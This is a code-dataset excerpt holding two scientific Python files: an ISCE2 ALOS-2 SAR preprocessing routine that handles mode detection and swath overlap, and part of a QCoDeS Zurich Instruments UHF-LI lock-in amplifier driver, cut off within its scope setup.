max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---|
components/isceobj/Alos2Proc/runPreprocessor.py | yuankailiu/isce2 | 1,133 | 69320 |
#
# Author: <NAME>
# Copyright 2015-present, NASA-JPL/Caltech
#
import os
import glob
import logging
import datetime
import numpy as np
import isceobj
import isceobj.Sensor.MultiMode as MultiMode
from isceobj.Planet.Planet import Planet
from isceobj.Alos2Proc.Alos2ProcPublic import runCmd
from isceobj.Alos2Proc.Alos2ProcPublic import getBboxRdr
from isceobj.Alos2Proc.Alos2ProcPublic import getBboxGeo
from isceobj.Alos2Proc.Alos2ProcPublic import modeProcParDict
logger = logging.getLogger('isce.alos2insar.runPreprocessor')
def runPreprocessor(self):
'''Extract images.
'''
catalog = isceobj.Catalog.createCatalog(self._insar.procDoc.name)
#find files
#actually no need to use absolute path any longer, since we are able to find file from vrt now. 27-JAN-2020, CRL.
#denseoffset may still need absolute path when making links
self.referenceDir = os.path.abspath(self.referenceDir)
self.secondaryDir = os.path.abspath(self.secondaryDir)
ledFilesReference = sorted(glob.glob(os.path.join(self.referenceDir, 'LED-ALOS2*-*-*')))
imgFilesReference = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*-*-*'.format(self.referencePolarization.upper()))))
ledFilesSecondary = sorted(glob.glob(os.path.join(self.secondaryDir, 'LED-ALOS2*-*-*')))
imgFilesSecondary = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*-*-*'.format(self.secondaryPolarization.upper()))))
firstFrameReference = ledFilesReference[0].split('-')[-3][-4:]
firstFrameSecondary = ledFilesSecondary[0].split('-')[-3][-4:]
firstFrameImagesReference = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper(), firstFrameReference))))
firstFrameImagesSecondary = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper(), firstFrameSecondary))))
#determine operation mode
referenceMode = os.path.basename(ledFilesReference[0]).split('-')[-1][0:3]
secondaryMode = os.path.basename(ledFilesSecondary[0]).split('-')[-1][0:3]
spotlightModes = ['SBS']
stripmapModes = ['UBS', 'UBD', 'HBS', 'HBD', 'HBQ', 'FBS', 'FBD', 'FBQ']
scansarNominalModes = ['WBS', 'WBD', 'WWS', 'WWD']
scansarWideModes = ['VBS', 'VBD']
scansarModes = ['WBS', 'WBD', 'WWS', 'WWD', 'VBS', 'VBD']
#usable combinations
if (referenceMode in spotlightModes) and (secondaryMode in spotlightModes):
self._insar.modeCombination = 0
elif (referenceMode in stripmapModes) and (secondaryMode in stripmapModes):
self._insar.modeCombination = 1
elif (referenceMode in scansarNominalModes) and (secondaryMode in scansarNominalModes):
self._insar.modeCombination = 21
elif (referenceMode in scansarWideModes) and (secondaryMode in scansarWideModes):
self._insar.modeCombination = 22
elif (referenceMode in scansarNominalModes) and (secondaryMode in stripmapModes):
self._insar.modeCombination = 31
elif (referenceMode in scansarWideModes) and (secondaryMode in stripmapModes):
self._insar.modeCombination = 32
else:
print('\n\nthis mode combination is not possible')
print('note that for ScanSAR-stripmap, ScanSAR must be reference\n\n')
raise Exception('mode combination not supported')
# pixel size from real data processing. azimuth pixel size may change a bit as
# the antenna points to a different swath and therefore uses a different PRF.
# MODE RANGE PIXEL SIZE (LOOKS) AZIMUTH PIXEL SIZE (LOOKS)
# -------------------------------------------------------------------
# SPT [SBS]
# 1.4304222392897463 (2) 0.9351804642158579 (4)
# SM1 [UBS,UBD]
# 1.4304222392897463 (2) 1.8291988125114438 (2)
# SM2 [HBS,HBD,HBQ]
# 2.8608444785794984 (2) 3.0672373839847196 (2)
# SM3 [FBS,FBD,FBQ]
# 4.291266717869248 (2) 3.2462615913656667 (4)
# WD1 [WBS,WBD] [WWS,WWD]
# 8.582533435738496 (1) 2.6053935830031887 (14)
# 8.582533435738496 (1) 2.092362043327227 (14)
# 8.582533435738496 (1) 2.8817632034495717 (14)
# 8.582533435738496 (1) 3.054362492601842 (14)
# 8.582533435738496 (1) 2.4582084463356977 (14)
# WD2 [VBS,VBD]
# 8.582533435738496 (1) 2.9215796012950728 (14)
# 8.582533435738496 (1) 3.088859074497863 (14)
# 8.582533435738496 (1) 2.8792293071133073 (14)
# 8.582533435738496 (1) 3.0592146044234854 (14)
# 8.582533435738496 (1) 2.8818767752199137 (14)
# 8.582533435738496 (1) 3.047038521027477 (14)
# 8.582533435738496 (1) 2.898816222039108 (14)
#determine default number of looks:
self._insar.numberRangeLooks1 = self.numberRangeLooks1
self._insar.numberAzimuthLooks1 = self.numberAzimuthLooks1
self._insar.numberRangeLooks2 = self.numberRangeLooks2
self._insar.numberAzimuthLooks2 = self.numberAzimuthLooks2
#the following two will be automatically determined by runRdrDemOffset.py
self._insar.numberRangeLooksSim = self.numberRangeLooksSim
self._insar.numberAzimuthLooksSim = self.numberAzimuthLooksSim
self._insar.numberRangeLooksIon = self.numberRangeLooksIon
self._insar.numberAzimuthLooksIon = self.numberAzimuthLooksIon
if self._insar.numberRangeLooks1 is None:
self._insar.numberRangeLooks1 = modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks1']
if self._insar.numberAzimuthLooks1 is None:
self._insar.numberAzimuthLooks1 = modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks1']
if self._insar.numberRangeLooks2 is None:
self._insar.numberRangeLooks2 = modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks2']
if self._insar.numberAzimuthLooks2 is None:
self._insar.numberAzimuthLooks2 = modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks2']
if self._insar.numberRangeLooksIon is None:
self._insar.numberRangeLooksIon = modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooksIon']
if self._insar.numberAzimuthLooksIon is None:
self._insar.numberAzimuthLooksIon = modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooksIon']
#define processing file names
self._insar.referenceDate = os.path.basename(ledFilesReference[0]).split('-')[2]
self._insar.secondaryDate = os.path.basename(ledFilesSecondary[0]).split('-')[2]
self._insar.setFilename(referenceDate=self._insar.referenceDate, secondaryDate=self._insar.secondaryDate, nrlks1=self._insar.numberRangeLooks1, nalks1=self._insar.numberAzimuthLooks1, nrlks2=self._insar.numberRangeLooks2, nalks2=self._insar.numberAzimuthLooks2)
#find frame numbers
if (self._insar.modeCombination == 31) or (self._insar.modeCombination == 32):
if (self.referenceFrames == None) or (self.secondaryFrames == None):
raise Exception('for ScanSAR-stripmap interferometry, you must set reference and secondary frame numbers')
#if not set, find frames automatically
if self.referenceFrames == None:
self.referenceFrames = []
for led in ledFilesReference:
frameNumber = os.path.basename(led).split('-')[1][-4:]
if frameNumber not in self.referenceFrames:
self.referenceFrames.append(frameNumber)
if self.secondaryFrames == None:
self.secondaryFrames = []
for led in ledFilesSecondary:
frameNumber = os.path.basename(led).split('-')[1][-4:]
if frameNumber not in self.secondaryFrames:
self.secondaryFrames.append(frameNumber)
#sort frames
self.referenceFrames = sorted(self.referenceFrames)
self.secondaryFrames = sorted(self.secondaryFrames)
#check number of frames
if len(self.referenceFrames) != len(self.secondaryFrames):
raise Exception('number of frames in reference dir is not equal to number of frames \
in secondary dir. please set frame number manually')
#find swath numbers (if not ScanSAR-ScanSAR, compute valid swaths)
if (self._insar.modeCombination == 0) or (self._insar.modeCombination == 1):
self.startingSwath = 1
self.endingSwath = 1
if self._insar.modeCombination == 21:
if self.startingSwath == None:
self.startingSwath = 1
if self.endingSwath == None:
self.endingSwath = 5
if self._insar.modeCombination == 22:
if self.startingSwath == None:
self.startingSwath = 1
if self.endingSwath == None:
self.endingSwath = 7
#determine starting and ending swaths for ScanSAR-stripmap, user's settings are overwritten
#use first frame to check overlap
if (self._insar.modeCombination == 31) or (self._insar.modeCombination == 32):
if self._insar.modeCombination == 31:
numberOfSwaths = 5
else:
numberOfSwaths = 7
overlapSubswaths = []
for i in range(numberOfSwaths):
overlapRatio = check_overlap(ledFilesReference[0], firstFrameImagesReference[i], ledFilesSecondary[0], firstFrameImagesSecondary[0])
if overlapRatio > 1.0 / 4.0:
overlapSubswaths.append(i+1)
if overlapSubswaths == []:
raise Exception('There is no overlap area between the ScanSAR-stripmap pair')
self.startingSwath = int(overlapSubswaths[0])
self.endingSwath = int(overlapSubswaths[-1])
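# Illustrative example (hypothetical numbers): if only subswaths 2, 3 and 4 of the
# reference ScanSAR acquisition overlap the stripmap frame by more than a quarter of
# the reference swath width, the code above sets startingSwath=2 and endingSwath=4.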
#save the valid frames and swaths for future processing
self._insar.referenceFrames = self.referenceFrames
self._insar.secondaryFrames = self.secondaryFrames
self._insar.startingSwath = self.startingSwath
self._insar.endingSwath = self.endingSwath
##################################################
#1. create directories and read data
##################################################
self.reference.configure()
self.secondary.configure()
self.reference.track.configure()
self.secondary.track.configure()
for i, (referenceFrame, secondaryFrame) in enumerate(zip(self._insar.referenceFrames, self._insar.secondaryFrames)):
#frame number starts with 1
frameDir = 'f{}_{}'.format(i+1, referenceFrame)
os.makedirs(frameDir, exist_ok=True)
os.chdir(frameDir)
#attach a frame to reference and secondary
frameObjReference = MultiMode.createFrame()
frameObjSecondary = MultiMode.createFrame()
frameObjReference.configure()
frameObjSecondary.configure()
self.reference.track.frames.append(frameObjReference)
self.secondary.track.frames.append(frameObjSecondary)
#swath number starts with 1
for j in range(self._insar.startingSwath, self._insar.endingSwath+1):
print('processing frame {} swath {}'.format(referenceFrame, j))
swathDir = 's{}'.format(j)
os.makedirs(swathDir, exist_ok=True)
os.chdir(swathDir)
#attach a swath to reference and secondary
swathObjReference = MultiMode.createSwath()
swathObjSecondary = MultiMode.createSwath()
swathObjReference.configure()
swathObjSecondary.configure()
self.reference.track.frames[-1].swaths.append(swathObjReference)
self.secondary.track.frames[-1].swaths.append(swathObjSecondary)
#setup reference
self.reference.leaderFile = sorted(glob.glob(os.path.join(self.referenceDir, 'LED-ALOS2*{}-*-*'.format(referenceFrame))))[0]
if referenceMode in scansarModes:
self.reference.imageFile = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.referencePolarization.upper(), referenceFrame, j))))[0]
else:
self.reference.imageFile = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper(), referenceFrame))))[0]
self.reference.outputFile = self._insar.referenceSlc
self.reference.useVirtualFile = self.useVirtualFile
#read reference
(imageFDR, imageData)=self.reference.readImage()
(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord)=self.reference.readLeader()
self.reference.setSwath(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.reference.setFrame(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.reference.setTrack(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
#setup secondary
self.secondary.leaderFile = sorted(glob.glob(os.path.join(self.secondaryDir, 'LED-ALOS2*{}-*-*'.format(secondaryFrame))))[0]
if secondaryMode in scansarModes:
self.secondary.imageFile = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.secondaryPolarization.upper(), secondaryFrame, j))))[0]
else:
self.secondary.imageFile = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper(), secondaryFrame))))[0]
self.secondary.outputFile = self._insar.secondarySlc
self.secondary.useVirtualFile = self.useVirtualFile
#read secondary
(imageFDR, imageData)=self.secondary.readImage()
(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord)=self.secondary.readLeader()
self.secondary.setSwath(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.secondary.setFrame(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.secondary.setTrack(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
os.chdir('../')
self._insar.saveProduct(self.reference.track.frames[-1], self._insar.referenceFrameParameter)
self._insar.saveProduct(self.secondary.track.frames[-1], self._insar.secondaryFrameParameter)
os.chdir('../')
self._insar.saveProduct(self.reference.track, self._insar.referenceTrackParameter)
self._insar.saveProduct(self.secondary.track, self._insar.secondaryTrackParameter)
catalog.printToLog(logger, "runPreprocessor")
self._insar.procDoc.addAllFromCatalog(catalog)
def check_overlap(ldr_m, img_m, ldr_s, img_s):
from isceobj.Constants import SPEED_OF_LIGHT
rangeSamplingRateReference, widthReference, nearRangeReference = read_param_for_checking_overlap(ldr_m, img_m)
rangeSamplingRateSecondary, widthSecondary, nearRangeSecondary = read_param_for_checking_overlap(ldr_s, img_s)
farRangeReference = nearRangeReference + (widthReference-1) * 0.5 * SPEED_OF_LIGHT / rangeSamplingRateReference
farRangeSecondary = nearRangeSecondary + (widthSecondary-1) * 0.5 * SPEED_OF_LIGHT / rangeSamplingRateSecondary
#This should be good enough, although precise image offsets are not used.
if farRangeReference <= nearRangeSecondary:
overlapRatio = 0.0
elif farRangeSecondary <= nearRangeReference:
overlapRatio = 0.0
else:
# indices: 0 = nearRangeReference, 1 = farRangeReference, 2 = nearRangeSecondary, 3 = farRangeSecondary
ranges = np.array([nearRangeReference, farRangeReference, nearRangeSecondary, farRangeSecondary])
rangesIndex = np.argsort(ranges)
overlapRatio = (ranges[rangesIndex[2]] - ranges[rangesIndex[1]]) / (farRangeReference - nearRangeReference)
return overlapRatio
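# Worked example for check_overlap() (illustrative numbers only, not from a real ALOS-2 pair):
# with nearRangeReference=800 km, farRangeReference=870 km, nearRangeSecondary=850 km and
# farRangeSecondary=920 km, the sorted endpoints are [800, 850, 870, 920] km, the middle
# gap is 870-850=20 km, and overlapRatio = 20/70 ~= 0.29, which passes the 1/4 threshold
# applied in runPreprocessor() above.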
def read_param_for_checking_overlap(leader_file, image_file):
from isceobj.Sensor import xmlPrefix
import isceobj.Sensor.CEOS as CEOS
#read from leader file
fsampConst = { 104: 1.047915957140240E+08,
52: 5.239579785701190E+07,
34: 3.493053190467460E+07,
17: 1.746526595233730E+07 }
fp = open(leader_file,'rb')
leaderFDR = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/leader_file.xml'),dataFile=fp)
leaderFDR.parse()
fp.seek(leaderFDR.getEndOfRecordPosition())
sceneHeaderRecord = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/scene_record.xml'),dataFile=fp)
sceneHeaderRecord.parse()
fp.seek(sceneHeaderRecord.getEndOfRecordPosition())
fsamplookup = int(sceneHeaderRecord.metadata['Range sampling rate in MHz'])
rangeSamplingRate = fsampConst[fsamplookup]
fp.close()
#print('{}'.format(rangeSamplingRate))
#read from image file
fp = open(image_file, 'rb')
imageFDR = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/image_file.xml'), dataFile=fp)
imageFDR.parse()
fp.seek(imageFDR.getEndOfRecordPosition())
imageData = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/image_record.xml'), dataFile=fp)
imageData.parseFast()
width = imageFDR.metadata['Number of pixels per line per SAR channel']
near_range = imageData.metadata['Slant range to 1st data sample']
fp.close()
#print('{}'.format(width))
#print('{}'.format(near_range))
return (rangeSamplingRate, width, near_range)
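# Consistency note (a sketch based only on the constants above): check_overlap() uses a
# slant-range sample spacing of 0.5*SPEED_OF_LIGHT/rangeSamplingRate. For the 104 MHz case
# (fsampConst[104] = 1.047915957140240e8 Hz) this gives 299792458/(2*1.047915957140240e8)
# ~= 1.4304 m, matching the SPT/SM1 range pixel size quoted in the comment table in
# runPreprocessor() above.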
qcodes/instrument_drivers/ZI/ZIUHFLI.py | riju-pal/QCoDeS_riju | 223 | 69344 |
import logging
import math
import time
from functools import partial
from math import sqrt
from typing import Any, Callable, Dict, List, Optional, Sequence, Union, cast
import numpy as np
from qcodes.utils.helpers import create_on_off_val_mapping
try:
import zhinst.utils
except ImportError:
raise ImportError('''Could not find Zurich Instruments Lab One software.
Please refer to the ZI UHF-LI User Manual for
download and installation instructions.
''')
from qcodes.instrument.base import Instrument
from qcodes.instrument.channel import ChannelList, InstrumentChannel
from qcodes.instrument.parameter import MultiParameter
from qcodes.utils import validators as vals
from qcodes.utils.deprecate import deprecate
log = logging.getLogger(__name__)
class AUXOutputChannel(InstrumentChannel):
def __init__(self, parent: 'ZIUHFLI', name: str, channum: int) -> None:
super().__init__(parent, name)
# TODO better validations of parameters
self.add_parameter('scale',
label='scale',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'scale'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'scale'),
vals=vals.Numbers()
)
self.add_parameter('preoffset',
label='preoffset',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'preoffset'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'preoffset'),
vals=vals.Numbers()
)
self.add_parameter('offset',
label='offset',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'offset'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'offset'),
vals=vals.Numbers()
)
self.add_parameter('limitlower',
label='Lower limit',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'limitlower'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'limitlower'),
vals=vals.Numbers()
)
self.add_parameter('limitupper',
label='Upper limit',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'limitupper'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'limitupper'),
vals=vals.Numbers()
)
# TODO the validator does not catch that there are only
# 2 valid output channels for AU types
self.add_parameter('channel',
label='Channel',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 0, 'demodselect'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 0, 'demodselect'),
get_parser=lambda x: x+1,
set_parser=lambda x: x-1,
vals=vals.Ints(0,7)
)
outputvalmapping = {'Demod X': 0,
'Demod Y': 1,
'Demod R': 2,
'Demod THETA': 3,
'AU Cartesian': 7,
'AU Polar': 8}
self.add_parameter('output',
label='Output',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 0, 'outputselect'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 0, 'outputselect'),
val_mapping=outputvalmapping
)
class Sweep(MultiParameter):
"""
Parameter class for the ZIUHFLI instrument class for the sweeper.
The get method returns a tuple of arrays, where each array contains the
values of a signal added to the sweep (e.g. demodulator 4 phase).
Attributes:
names (tuple): Tuple of strings containing the names of the sweep
signals (to be measured)
units (tuple): Tuple of strings containing the units of the signals
shapes (tuple): Tuple of tuples each containing the Length of a
signal.
setpoints (tuple): Tuple of N copies of the sweep x-axis points,
where N is the number of measured signals
setpoint_names (tuple): Tuple of N identical strings with the name
of the sweep x-axis.
"""
def __init__(self, name, instrument, **kwargs):
# The __init__ requires that we supply names and shapes,
# but there is no way to know what they will be at this time.
# They are updated via build_sweep.
super().__init__(
name, names=("",), shapes=((1,),), instrument=instrument, **kwargs
)
def build_sweep(self):
"""
Build a sweep with the current sweep settings. Must be called
before the sweep can be executed.
For developers:
This is a general function for updating the sweeper.
Every time a parameter of the sweeper is changed, this function
must be called to update the sweeper. Although such behaviour is only
strictly necessary for parameters that affect the setpoints of the
Sweep parameter, having to call this function for any parameter is
deemed more user friendly (easier to remember; when? -always).
The function sets all (user specified) settings on the sweeper and
additionally sets names, units, and setpoints for the Sweep
parameter.
"""
signals = self.instrument._sweeper_signals
sweepdict = self.instrument._sweepdict
log.info('Built a sweep')
sigunits = {'X': 'V', 'Y': 'V', 'R': 'Vrms', 'Xrms': 'Vrms',
'Yrms': 'Vrms', 'Rrms': 'Vrms', 'phase': 'degrees'}
names = []
units = []
for sig in signals:
name = sig.split('/')[-1]
names.append(name)
units.append(sigunits[name])
self.names = tuple(names)
self.units = tuple(units)
self.labels = tuple(names) # TODO: What are good labels?
# TODO: what are good set point names?
spnamedict = {'auxouts/0/offset': 'Volts',
'auxouts/1/offset': 'Volts',
'auxouts/2/offset': 'Volts',
'auxouts/3/offset': 'Volts',
'demods/0/phaseshift': 'degrees',
'demods/1/phaseshift': 'degrees',
'demods/2/phaseshift': 'degrees',
'demods/3/phaseshift': 'degrees',
'demods/4/phaseshift': 'degrees',
'demods/5/phaseshift': 'degrees',
'demods/6/phaseshift': 'degrees',
'demods/7/phaseshift': 'degrees',
'oscs/0/freq': 'Hz',
'oscs/1/freq': 'Hz',
'sigouts/0/amplitudes/3': 'Volts',
'sigouts/0/offset': 'Volts',
'sigouts/1/amplitudes/7': 'Volts',
'sigouts/1/offset': 'Volts'
}
sp_name = spnamedict[sweepdict['gridnode']]
self.setpoint_names = ((sp_name,),)*len(signals)
start = sweepdict['start']
stop = sweepdict['stop']
npts = sweepdict['samplecount']
# TODO: make sure that these setpoints are correct, i.e. actually
# matching what the UHFLI does
# TODO: support non-sequential sweep mode
if not sweepdict['scan'] == 0:
raise NotImplementedError('Only sequential scanning is supported.')
if sweepdict['xmapping'] == 0:
sw = tuple(np.linspace(start, stop, npts))
else:
logstart = np.log10(start)
logstop = np.log10(stop)
sw = tuple(np.logspace(logstart, logstop, npts))
self.setpoints = ((sw,),)*len(signals)
self.shapes = ((npts,),)*len(signals)
# Now actually send the settings to the instrument
for (setting, value) in sweepdict.items():
setting = 'sweep/' + setting
self.instrument.sweeper.set(setting, value)
self.instrument.sweep_correctly_built = True
def get_raw(self):
"""
Execute the sweeper and return the data corresponding to the
subscribed signals.
Returns:
tuple: Tuple containing N numpy arrays where N is the number
of signals added to the sweep.
Raises:
ValueError: If no signals have been added to the sweep
ValueError: If a sweep setting has been modified since
the last sweep, but Sweep.build_sweep has not been run
"""
daq = self.instrument.daq
signals = self.instrument._sweeper_signals
sweeper = self.instrument.sweeper
if signals == []:
raise ValueError('No signals selected! Can not perform sweep.')
if self.instrument.sweep_correctly_built is False:
raise ValueError('The sweep has not been correctly built.' +
' Please run Sweep.build_sweep.')
# We must enable the demodulators we use.
# After the sweep, they should be returned to their original state
streamsettings = [] # This list keeps track of the pre-sweep settings
for sigstr in signals:
path = '/'.join(sigstr.split('/')[:-1])
(_, dev, _, dmnum, _) = path.split('/')
# If the setting has never changed, get returns an empty dict.
# In that case, we assume that it's zero (factory default)
try:
toget = path.replace('sample', 'enable')
# ZI like nesting inside dicts...
setting = daq.get(toget)[dev]['demods'][dmnum]['enable']['value'][0]
except KeyError:
setting = 0
streamsettings.append(setting)
daq.setInt(path.replace('sample', 'enable'), 1)
# We potentially subscribe several times to the same demodulator,
# but that should not be a problem
sweeper.subscribe(path)
sweeper.execute()
timeout = self.instrument.sweeper_timeout.get()
start = time.time()
while not sweeper.finished(): # Wait until the sweep is done/timeout
time.sleep(0.2) # Check every 200 ms whether the sweep is done
# Here we could read intermediate data via:
# data = sweeper.read(True)...
# and process it while the sweep is completing.
if (time.time() - start) > timeout:
# If for some reason the sweep is blocking, force the end of the
# measurement.
log.error("Sweep still not finished, forcing finish...")
# should exit function with error message instead of returning
sweeper.finish()
return_flat_dict = True
data = sweeper.read(return_flat_dict)
sweeper.unsubscribe('*')
for (state, sigstr) in zip(streamsettings, signals):
path = '/'.join(sigstr.split('/')[:-1])
daq.setInt(path.replace('sample', 'enable'), int(state))
return self._parsesweepdata(data)
def _parsesweepdata(self, sweepresult):
"""
Parse the raw result of a sweep into just the data asked for by the
added sweeper signals. Used by Sweep.get.
Args:
sweepresult (dict): The dict returned by sweeper.read
Returns:
tuple: The requested signals in a tuple
"""
trans = {'X': 'x', 'Y': 'y', 'Aux Input 1': 'auxin0',
'Aux Input 2': 'auxin1', 'R': 'r', 'phase': 'phase',
'Xrms': 'xpwr', 'Yrms': 'ypwr', 'Rrms': 'rpwr'}
returndata = []
for signal in self.instrument._sweeper_signals:
path = '/'.join(signal.split('/')[:-1])
attr = signal.split('/')[-1]
data = sweepresult[path][0][0][trans[attr]]
returndata.append(data)
return tuple(returndata)
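# For reference (inferred from the parsing above): each entry of _sweeper_signals is a node
# string of the form '/dev2000/demods/0/sample/X' ('dev2000' is a placeholder device ID),
# i.e. a demodulator sample node followed by one of the attributes 'X', 'Y', 'R', 'phase',
# 'Xrms', 'Yrms' or 'Rrms'.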
class Scope(MultiParameter):
"""
Parameter class for the ZI UHF-LI Scope Channel 1
The .get method launches an acquisition and returns a tuple of two
np.arrays
FFT mode is NOT supported.
Attributes:
names (tuple): Tuple of strings containing the names of the sweep
signals (to be measured)
units (tuple): Tuple of strings containing the units of the signals
shapes (tuple): Tuple of tuples each containing the Length of a
signal.
setpoints (tuple): Tuple of N copies of the sweep x-axis points,
where N is the number of measured signals
setpoint_names (tuple): Tuple of N identical strings with the name
of the sweep x-axis.
"""
def __init__(self, name, instrument, **kwargs):
# The __init__ requires that we supply names and shapes,
# but there is no way to know what they will be at this time.
# They are updated via build_scope.
super().__init__(
name, names=("",), shapes=((1,),), instrument=instrument, **kwargs
)
self._scopeactions = [] # list of callables
def add_post_trigger_action(self, action: Callable[..., Any]) -> None:
"""
Add an action to be performed immediately after the trigger
has been armed. The action must be a callable taking zero
arguments
"""
if action not in self._scopeactions:
self._scopeactions.append(action)
@property
def post_trigger_actions(self) -> List[Callable[..., Any]]:
return self._scopeactions
def prepare_scope(self):
"""
Prepare the scope for a measurement. Must immediately precede a
measurement.
"""
log.info('Preparing the scope')
# A convenient reference
params = self.instrument.parameters
# First figure out what the user has asked for
chans = {1: (True, False), 2: (False, True), 3: (True, True)}
channels = chans[params['scope_channels'].get()]
npts = params['scope_length'].get()
# Find out whether segments are enabled
if params['scope_segments'].get() == 'ON':
segs = params['scope_segments_count'].get()
else:
segs = 1
inputunits = {'Signal Input 1': 'V',
'Signal Input 2': 'V',
'Trig Input 1': 'V',
'Trig Input 2': 'V',
'Aux Output 1': 'V',
'Aux Output 2': 'V',
'Aux Output 3': 'V',
'Aux Output 4': 'V',
'Aux In 1 Ch 1': 'V',
'Aux In 1 Ch 2': 'V',
'Osc phi Demod 4': '°',
'Osc phi Demod 8': '°',
'AU Cartesian 1': 'arb. un.',
'AU Cartesian 2': 'arb. un.',
'AU Polar 1': 'arb. un.',
'AU Polar 2': 'arb. un.',
'Demod 1 X': 'V',
'Demod 1 Y': 'V',
'Demod 1 R': 'V',
'Demod 1 Phase': '°',
'Demod 2 X': 'V',
'Demod 2 Y': 'V',
'Demod 2 R': 'V',
'Demod 2 Phase': '°',
'Demod 3 X': 'V',
'Demod 3 Y': 'V',
'Demod 3 R': 'V',
'Demod 3 Phase': '°',
'Demod 4 X': 'V',
'Demod 4 Y': 'V',
'Demod 4 R': 'V',
'Demod 4 Phase': '°',
'Demod 5 X': 'V',
'Demod 5 Y': 'V',
'Demod 5 R': 'V',
'Demod 5 Phase': '°',
'Demod 6 X': 'V',
'Demod 6 Y': 'V',
'Demod 6 R': 'V',
'Demod 6 Phase': '°',
'Demod 7 X': 'V',
'Demod 7 Y': 'V',
'Demod 7 R': 'V',
'Demod 7 Phase': '°',
'Demod 8 X': 'V',
'Demod 8 Y': 'V',
'Demod 8 R': 'V',
'Demod 8 Phase': '°',
}
#TODO: what are good names?
inputnames = {'Signal Input 1': 'Sig. In 1',
'Signal Input 2': 'Sig. In 2',
'Trig Input 1': 'Trig. In 1',
'Trig Input 2': 'Trig. In 2',
'Aux Output 1': 'Aux. Out 1',
'Aux Output 2': 'Aux. Out 2',
'Aux Output 3': 'Aux. Out 3',
'Aux Output 4': 'Aux. Out 4',
'Aux In 1 Ch 1': 'Aux. In 1 Ch 1',
'Aux In 1 Ch 2': 'Aux. In 1 Ch 2',
'Osc phi Demod 4': 'Demod. 4 Phase',
'Osc phi Demod 8': 'Demod. 8 Phase',
'AU Cartesian 1': 'AU Cartesian 1',
'AU Cartesian 2': 'AU Cartesian 2',
'AU Polar 1': 'AU Polar 1',
'AU Polar 2': 'AU Polar 2',
'Demod 1 X': 'Demodulator 1 X',
'Demod 1 Y': 'Demodulator 1 Y',
'Demod 1 R': 'Demodulator 1 R',
'Demod 1 Phase': 'Demodulator 1 Phase',
'Demod 2 X': 'Demodulator 2 X',
'Demod 2 Y': 'Demodulator 2 Y',
'Demod 2 R': 'Demodulator 2 R',
'Demod 2 Phase': 'Demodulator 2 Phase',
'Demod 3 X': 'Demodulator 3 X',
'Demod 3 Y': 'Demodulator 3 Y',
'Demod 3 R': 'Demodulator 3 R',
'Demod 3 Phase': 'Demodulator 3 Phase',
'Demod 4 X': 'Demodulator 4 X',
'Demod 4 Y': 'Demodulator 4 Y',
'Demod 4 R': 'Demodulator 4 R',
'Demod 4 Phase': 'Demodulator 4 Phase',
'Demod 5 X': 'Demodulator 5 X',
'Demod 5 Y': 'Demodulator 5 Y',
'Demod 5 R': 'Demodulator 5 R',
'Demod 5 Phase': 'Demodulator 5 Phase',
'Demod 6 X': 'Demodulator 6 X',
'Demod 6 Y': 'Demodulator 6 Y',
'Demod 6 R': 'Demodulator 6 R',
'Demod 6 Phase': 'Demodulator 6 Phase',
'Demod 7 X': 'Demodulator 7 X',
'Demod 7 Y': 'Demodulator 7 Y',
'Demod 7 R': 'Demodulator 7 R',
'Demod 7 Phase': 'Demodulator 7 Phase',
'Demod 8 X': 'Demodulator 8 X',
'Demod 8 Y': 'Demodulator 8 Y',
'Demod 8 R': 'Demodulator 8 R',
'Demod 8 Phase': 'Demodulator 8 Phase',
}
# Make the basic setpoints (the x-axis)
duration = params['scope_duration'].get()
